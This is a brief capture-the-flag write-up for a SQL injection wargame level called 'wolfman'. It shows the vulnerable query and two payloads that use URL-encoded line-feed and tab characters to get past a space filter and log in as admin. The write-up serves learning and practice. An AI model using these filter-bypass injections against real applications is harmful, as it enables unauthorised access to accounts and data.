Skip to main content

wolfman

1

We are provided with the SQL query:

SELECT id FROM prob_wolfman WHERE id='guest' AND pw='{$_GET[pw]}'

This level prints out the flag if the id=admin.

However, it also removes all space characters. In order to get around this, we need to use the Line Feed (%0A) character.

If we provide the following URI parameter:

?pw='%0AOR%0Aid='admin

The resultant query becomes:

SELECT id FROM prob_wolfman WHERE id='guest' AND pw=''
OR
id='admin'

2

We can also solvethe challenge by using the Tab (%09) character.

If we provide the following URI parameter:

?pw='%09OR%09id='admin

The resultant query becomes:

SELECT id FROM prob_wolfman WHERE id='guest' AND pw=''  OR  id='admin'

3